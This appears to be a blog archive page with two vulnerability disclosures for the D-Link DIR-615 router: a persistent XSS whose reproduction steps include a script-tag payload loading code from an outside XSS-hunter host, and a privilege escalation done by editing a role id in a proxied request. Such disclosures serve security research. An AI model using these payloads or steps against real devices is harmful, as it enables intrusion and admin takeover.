Posts

Showing posts from December, 2019

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

############################## ############################## ########################## # Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting # Date: 13.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage:  http://www.dlink.co. in # Category: Hardware (Wi-fi Router) # Hardware Link:  http://www.dlink.co.in/ products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19742 ############################## ############################## ########################### Reproduction Steps:  — — — — — — — — — — — — — — —  Login to your wi-fi router gateway with admin credentials [i.e:  http://192.168.0.1 ] Go to Maintenance page and click on Admin on the left pannel. Put blind XSS Payload in to the name field — “><script src= https://ptguy.xss.ht ></ script>. This payload saved by the server and its reflected in the user page. Every refresh in the...

D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

Image
###################################################################################### # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation # Date: 10.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19743 ####################################################################################### Reproduction Steps: Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1 ] Go to the Maintenance page and click on Admin on the left panel. There is an option to create a user and by default, it shows only user accounts. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite. Privilege Escalation Post Request...